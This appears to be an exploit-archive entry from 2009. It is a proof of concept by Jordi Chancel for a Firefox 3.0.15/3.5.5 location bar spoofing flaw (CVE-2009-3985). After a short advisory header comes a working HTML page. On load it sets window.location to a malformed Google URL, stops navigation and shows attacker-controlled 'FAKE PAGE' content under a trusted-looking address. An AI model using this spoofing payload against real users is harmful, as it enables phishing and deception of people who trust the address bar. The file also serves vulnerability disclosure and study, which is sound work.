`<!-----------------------------------------------------------------
Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
Date: 2009-12-18
Author: Jordi Chancel
Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
Version: Mozilla Firefox 3.0.15 & 3.5.5
Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
DESCRIPTION: {
Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
in which a web page can set document.location to a URL that can't be displayed properly and then inject
content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking
but invalid URL in the location bar and inject HTML and JavaScript into the body of the
page, resulting in a spoofing attack. }
Code :
------------------------------------------------------------------------>
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<title>FAKE PAGE</title>
<h1>FAKE PAGE</h1>
<body>
</html>
`